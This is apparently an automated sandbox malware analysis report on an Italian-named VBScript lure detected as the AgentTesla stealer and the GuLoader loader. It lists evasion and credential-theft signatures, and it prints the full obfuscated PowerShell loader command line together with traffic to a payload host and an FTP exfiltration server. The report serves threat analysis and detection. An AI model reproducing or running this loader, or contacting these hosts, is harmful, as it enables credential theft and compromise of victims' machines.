Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name:Richiesta urgente.vbs
Analysis ID:755115
MD5:de0edf01710a38b1e96688ae2f712ebb
SHA1:6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256:20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 1004 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Richiesta urgente.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa34:$s1: .CreateObject("WScript.Shell")
  • 0x3f562:$p1: powershell.exe
  • 0x4c69c:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 5840INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x15ed6:$b2: ::FromBase64String(
          • 0x5e98a:$b2: ::FromBase64String(
          • 0x17beb2:$b2: ::FromBase64String(
          • 0x268a5:$s1: -join
          • 0x27005:$s1: -join
          • 0xb3272:$s1: -join
          • 0xc0347:$s1: -join
          • 0xc3719:$s1: -join
          • 0xc3dcb:$s1: -join
          • 0xc58bc:$s1: -join
          • 0xc7ac2:$s1: -join
          • 0xc82e9:$s1: -join
          • 0xc8b59:$s1: -join
          • 0xc9294:$s1: -join
          • 0xc92c6:$s1: -join
          • 0xc930e:$s1: -join
          • 0xc932d:$s1: -join
          • 0xc9b7d:$s1: -join
          • 0xc9cf9:$s1: -join
          • 0xc9d71:$s1: -join
          • 0xc9e04:$s1: -join
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_4088.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
          • 0x1a:$s1: .CreateObject("WScript.Shell")
          • 0x72:$s1: .CreateObject("WScript.Shell")
          • 0x1d9:$p1: powershell.exe

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""U
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp
          Source: Joe Sandbox ViewIP Address: 185.31.121.136 185.31.121.136
          Source: global trafficHTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.2.5:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.mcmprint.netnoffice
          Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3LpbHlMRrrHdHc2KU.net
          Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://OowQOv.com
          Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
          Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
          Source: powershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: qwedft.gq
          Source: global trafficHTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo 